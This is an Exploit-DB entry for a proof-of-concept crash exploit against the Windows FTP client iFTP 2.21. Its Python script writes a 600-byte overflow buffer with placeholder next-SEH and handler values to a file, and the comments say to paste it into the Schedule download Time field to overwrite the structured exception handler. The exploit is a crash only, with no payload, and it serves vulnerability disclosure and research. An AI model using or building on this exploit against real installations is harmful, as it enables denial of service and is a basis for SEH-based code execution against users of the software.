i.FTP 2.21 - Overflow Crash (SEH) (PoC)

Author: Avinash Thapa
type: dos
platform: windows
port: 
date_added: 2015-04-28  
date_updated: 2016-10-10  
verified: 1  
codes: OSVDB-114279  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt37000/screen-shot-2015-04-28-at-10235-pm.png  
application_url: http://www.exploit-db.comiftp-win32-v2.21.exe  

raw file: 36847.py  

# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing :  28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field


buffer = "A"*600

buffer += "BBBB" # Pointer to Next SEH Record

buffer += "CCCC" # SEH HANDLER


file = "test.txt"

f = open(file, "w")

f.write(buffer)

f.close()